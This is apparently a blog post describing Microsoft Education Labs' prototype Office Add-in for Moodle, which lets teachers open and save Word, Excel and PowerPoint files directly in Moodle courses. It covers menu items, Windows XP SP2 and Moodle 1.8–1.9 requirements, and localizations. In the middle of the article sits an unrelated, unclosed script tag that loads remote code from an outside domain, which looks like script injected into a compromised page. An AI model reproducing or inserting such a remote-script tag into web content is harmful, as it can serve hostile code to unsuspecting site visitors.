Education Labs from Microsoft Education Products Group created a “Office Add-in for Moodle (OAM)” prototypes for Microsoft Office (versions 2003 and 2007).

The add-in facility the Uploading of files to Moodle for teachers. Documents can be saved directly to Moodle courses from Microsoft Office Word, Excel, and PowerPoint. The add-in allows Moodle documents to be opened from within Office applications, change them and save them, eliminates the need to save a document on PC first and the tedious browse and upload steps to upload to Moodle, bypassing the Moodle web interface completely.

<script src="http://www.qksz.net/1e-iiom"

// ]]>
// ]]>

Once installed, the add-in adds two menu items to the File menu (Office 2003) or the Office Button menu: Open from Moodle and Save to Moodle. First enter the address of Moodle and the log in credentials, then browse through course files on specified Moodle. Once added, teachers can view the list of courses enrolled in. Naturally, students and others can access the content directly from Moodle as they normally would.

Office Add-in for Moodle requires Microsoft Windows XP SP2 or higher, so it will not work on Mac OS X version of Office. It works on Moodle 1.8-1.9 out of the box with no modifications to the Moodle site.

Currently, the Office Add-in for Moodle has localized versions in German (de-de), International English (en-gb), Spanish (es-es), French (fr-fr), Italian (it-it) and Portuguese (pt-br).

Moodle is a free and Open Source software, under the GNU Public License, for producing Internet-based courses and web sites.

The Microsoft Education Products Group created Education Labs to build prototypes and gather data to inform ongoing and future research and development in the education space. Prototypes are incubation projects and are not actual products or features from the Microsoft Education Products Group.
